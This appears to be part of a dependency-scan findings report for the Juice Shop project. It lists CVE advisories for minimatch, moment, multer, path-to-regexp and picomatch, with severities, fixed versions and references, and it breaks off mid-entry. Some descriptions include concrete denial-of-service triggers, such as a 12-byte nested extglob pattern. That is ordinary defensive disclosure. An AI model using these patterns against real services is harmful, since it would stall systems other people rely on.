juice-shop/node_modules/glob/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 166: CVE-2026-27903 Minimatch 9.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch9.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/glob/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 167: CVE-2026-27904 Minimatch 9.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch9.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/glob/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 168: CVE-2017-18214 Moment 2.0.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
moment2.0.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/moment/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

nodejs-moment: Regular expression denial of service
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.19.3

+

The moment module before 2.19.3 for Node.js is prone to a regular +expression denial of service via a crafted date string, a different +vulnerability than CVE-2016-4055.

+ + +
Mitigation
+

2.19.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2017-18214
+https://github.com/advisories/GHSA-446m-mv8f-q348
+https://github.com/moment/moment
+https://github.com/moment/moment/commit/69ed9d44957fa6ab12b73d2ae29d286a857b80eb
+https://github.com/moment/moment/issues/4163
+https://github.com/moment/moment/pull/4326
+https://nodesecurity.io/advisories/532
+https://nvd.nist.gov/vuln/detail/CVE-2017-18214
+https://ubuntu.com/security/notices/USN-4786-1
+https://www.cve.org/CVERecord?id=CVE-2017-18214
+https://www.npmjs.com/advisories/532
+https://www.tenable.com/security/tns-2019-02

+ + + + + + + +
+
+
+
+ Finding 169: CVE-2022-24785 Moment 2.0.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 22 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
moment2.0.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/moment/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

+ + +
Description
+

Moment.js: Path traversal in moment.locale
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.29.2

+

Moment.js is a JavaScript date library for parsing, validating, +manipulating, and formatting dates. A path traversal vulnerability +impacts npm (server) users of Moment.js between versions 1.0.1 and +2.29.1, especially if a user-provided locale string is directly used to +switch moment locale. This problem is patched in 2.29.2, and the patch +can be applied to all affected versions. As a workaround, sanitize the +user-provided locale name before passing it to Moment.js.

+ + +
Mitigation
+

2.29.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-24785
+https://github.com/moment/moment
+https://github.com/moment/moment/commit/4211bfc8f15746be4019bba557e29a7ba83d54c5
+https://github.com/moment/moment/security/advisories/GHSA-8hfj-j24r-96c4
+https://lists.debian.org/debian-lts-announce/2023/01/msg00035.html
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/ +message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/ +message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q/
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/message/ +ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/message/ +ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5/
+https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q
+https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5
+https://nvd.nist.gov/vuln/detail/CVE-2022-24785
+https://security.netapp.com/advisory/ntap-20220513-0006
+https://security.netapp.com/advisory/ntap-20220513-0006/
+https://security.netapp.com/advisory/ntap-20241108-0002
+https://security.netapp.com/advisory/ntap-20241108-0002/
+https://ubuntu.com/security/notices/USN-5559-1
+https://www.cve.org/CVERecord?id=CVE-2022-24785
+https://www.tenable.com/security/tns-2022-09

+ + + + + + + +
+
+
+
+ Finding 171: CVE-2025-47935 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 401 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

Multer vulnerable to Denial of Service via memory leaks from unclosed streams
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.0.0

+

Multer is a node.js middleware for handling multipart/form-data. + Versions prior to 2.0.0 are vulnerable to a resource exhaustion and +memory leak issue due to improper stream handling. When the HTTP request + stream emits an error, the internal busboy stream is not +closed, violating Node.js stream safety guidance. This leads to unclosed + streams accumulating over time, consuming memory and file descriptors. +Under sustained or repeated failure conditions, this can result in +denial of service, requiring manual server restarts to recover. All +users of Multer handling file uploads are potentially impacted. Users +should upgrade to 2.0.0 to receive a patch. No known workarounds are +available.

+ + +
Mitigation
+

2.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665
+https://github.com/expressjs/multer/pull/1120
+https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5
+https://nvd.nist.gov/vuln/detail/CVE-2025-47935

+ + + + + + + +
+
+
+
+ Finding 172: CVE-2025-47944 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 248 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

Multer vulnerable to Denial of Service from maliciously crafted requests
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.0.0

+

Multer is a node.js middleware for handling multipart/form-data. + A vulnerability that is present starting in version 1.4.4-lts.1 and +prior to version 2.0.0 allows an attacker to trigger a Denial of Service + (DoS) by sending a malformed multi-part upload request. This request +causes an unhandled exception, leading to a crash of the process. Users +should upgrade to version 2.0.0 to receive a patch. No known workarounds + are available.

+ + +
Mitigation
+

2.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665
+https://github.com/expressjs/multer/issues/1176
+https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h
+https://nvd.nist.gov/vuln/detail/CVE-2025-47944

+ + + + + + + +
+
+
+
+ Finding 173: CVE-2025-48997 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 248 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + + +
Description
+

multer: Multer vulnerable to Denial of Service via unhandled exception
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.0.1

+

Multer is a node.js middleware for handling multipart/form-data. + A vulnerability that is present starting in version 1.4.4-lts.1 and +prior to version 2.0.1 allows an attacker to trigger a Denial of Service + (DoS) by sending an upload file request with an empty string field +name. This request causes an unhandled exception, leading to a crash of +the process. Users should upgrade to 2.0.1 to receive a patch. No known workarounds are available.

+ + +
Mitigation
+

2.0.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-48997
+https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9
+https://github.com/expressjs/multer/issues/1233
+https://github.com/expressjs/multer/pull/1256
+https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg
+https://nvd.nist.gov/vuln/detail/CVE-2025-48997
+https://www.cve.org/CVERecord?id=CVE-2025-48997

+ + + + + + + +
+
+
+
+ Finding 174: CVE-2025-7338 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 248 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

multer: Multer Denial of Service
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.0.2

+

Multer is a node.js middleware for handling multipart/form-data. + A vulnerability that is present starting in version 1.4.4-lts.1 and +prior to version 2.0.2 allows an attacker to trigger a Denial of Service + (DoS) by sending a malformed multi-part upload request. This request +causes an unhandled exception, leading to a crash of the process. Users +should upgrade to version 2.0.2 to receive a patch. No known workarounds + are available.

+ + +
Mitigation
+

2.0.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-7338
+https://cna.openjsf.org/security-advisories.html
+https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b
+https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p
+https://nvd.nist.gov/vuln/detail/CVE-2025-7338
+https://www.cve.org/CVERecord?id=CVE-2025-7338

+ + + + + + + +
+
+
+
+ Finding 175: CVE-2026-2359 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 772 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + + +
Description
+

multer: Multer: Denial of Service via dropped file upload connections
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.1.0

+

Multer is a node.js middleware for handling multipart/form-data. + A vulnerability in Multer prior to version 2.1.0 allows an attacker to +trigger a Denial of Service (DoS) by dropping connection during file +upload, potentially causing resource exhaustion. Users should upgrade to + version 2.1.0 to receive a patch. No known workarounds are available.

+ + +
Mitigation
+

2.1.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-2359
+https://cna.openjsf.org/security-advisories.html
+https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab
+https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc
+https://nvd.nist.gov/vuln/detail/CVE-2026-2359
+https://www.cve.org/CVERecord?id=CVE-2026-2359

+ + + + + + + +
+
+
+
+ Finding 176: CVE-2026-3304 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 459 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + + +
Description
+

multer: Multer: Denial of Service via malformed requests
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.1.0

+

Multer is a node.js middleware for handling multipart/form-data. + A vulnerability in Multer prior to version 2.1.0 allows an attacker to +trigger a Denial of Service (DoS) by sending malformed requests, +potentially causing resource exhaustion. Users should upgrade to version + 2.1.0 to receive a patch. No known workarounds are available.

+ + +
Mitigation
+

2.1.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-3304
+https://cna.openjsf.org/security-advisories.html
+https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee
+https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p
+https://nvd.nist.gov/vuln/detail/CVE-2026-3304
+https://www.cve.org/CVERecord?id=CVE-2026-3304

+ + + + + + + +
+
+
+
+ Finding 177: CVE-2026-3520 Multer 1.4.5-lts.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
multer1.4.5-lts.2
+ + + + + + + +
File Path
juice-shop/node_modules/multer/package.json
+
+
+
+ + + + + +
Description
+

multer: Multer: Denial of Service via malformed requests
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.1.1

+

Multer is a node.js middleware for handling multipart/form-data. + A vulnerability in Multer prior to version 2.1.1 allows an attacker to +trigger a Denial of Service (DoS) by sending malformed requests, +potentially causing stack overflow. Users should upgrade to version +2.1.1 to receive a patch. No known workarounds are available.

+ + +
Mitigation
+

2.1.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-3520
+https://cna.openjsf.org/security-advisories.html
+https://github.com/expressjs/multer
+https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752
+https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2
+https://nvd.nist.gov/vuln/detail/CVE-2026-3520
+https://www.cve.org/CVERecord?id=CVE-2026-3520

+ + + + + + + +
+
+
+
+ Finding 179: CVE-2026-4867 Path-to-Regexp 0.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
path-to-regexp0.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/path-to-regexp/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

path-to-regexp: path-to-regexp: Denial of Service via catastrophic backtracking from malformed URL parameters
+Target: Node.js
+Type: node-pkg
+Fixed version: 0.1.13

+

Impact:

+

A bad regular expression is generated any time you have three or more + parameters within a single segment, separated by something that is not a + period (.). For example, /:a-:b-:c or /:a-:b-:c-:d. The backtrack +protection added in path-to-regexp@0.1.12 only prevents ambiguity for +two parameters. With three or more, the generated lookahead does not +block single separator characters, so capture groups overlap and cause +catastrophic backtracking.

+

Patches:

+

Upgrade to path-to-regexp@0.1.13

+

Custom regex patterns in route definitions (e.g., +/:a-:b([^-/]+)-:c([^-/]+)) are not affected because they override the +default capture group.

+

Workarounds:

+

All versions can be patched by providing a custom regular expression +for parameters after the first in a single segment. As long as the +custom regular expression does not match the text before the parameter, +you will be safe. For example, change /:a-:b-:c to +/:a-:b([^-/]+)-:c([^-/]+).

+

If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length.

+ + +
Mitigation
+

0.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-4867
+https://blakeembrey.com/posts/2024-09-web-redos
+https://cna.openjsf.org/security-advisories.html
+https://github.com/advisories/GHSA-9wv6-86v2-598j
+https://github.com/pillarjs/path-to-regexp
+https://github.com/pillarjs/path-to-regexp/releases/tag/v.0.1.13
+https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-37ch-88jc-xwx2
+https://nvd.nist.gov/vuln/detail/CVE-2026-4867
+https://www.cve.org/CVERecord?id=CVE-2026-4867

+ + + + + + + +
+
+
+
+ Finding 180: CVE-2026-33671 Picomatch 2.3.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
picomatch2.3.1
+ + + + + + + +
File Path
juice-shop/node_modules/picomatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.0.4, 3.0.2, 2.3.2

+

Picomatch is a glob matcher written JavaScript. Versions prior to +4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of +Service (ReDoS) when processing crafted extglob patterns. Certain +patterns using extglob quantifiers such as +() and *(), + especially when combined with overlapping alternatives or nested +extglobs, are compiled into regular expressions that can exhibit +catastrophic backtracking on non-matching input. Applications are +impacted when they allow untrusted users to supply glob patterns that +are passed to picomatch for compilation or matching. In +those cases, an attacker can cause excessive CPU consumption and block +the Node.js event loop, resulting in a denial of service. Applications +that only use trusted, developer-controlled glob patterns are much less +likely to be exposed in a security-relevant way. This issue is fixed in +picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these +versions or later, depending on their supported release line. If +upgrading is not immediately possible, avoid passing untrusted glob +patterns to picomatch. Possible mitigations include disabling extglob support for untrusted patterns by using noextglob: true, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as +() and *(), + enforcing strict allowlists for accepted pattern syntax, running +matching in an isolated worker or separate process with time and +resource limits, and applying application-level request throttling and +input validation for any endpoint that accepts glob patterns.

+ + +
Mitigation
+

4.0.4, 3.0.2, 2.3.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33671
+https://github.com/micromatch/picomatch
+https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d
+https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj
+https://nvd.nist.gov/vuln/detail/CVE-2026-33671
+https://www.cve.org/CVERecord?id=CVE-2026-33671

+ + + + + + + +
+
+
+
+ Finding 182: CVE-2026-33671 Picomatch 4.0.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
picomatch4.0.3
+ + + + + + + +
File Path
juice-shop/node_modules/tinyglobby/node_modules/picomatch/package.json
+
+
+
+ + + + +
CVSS v3
+

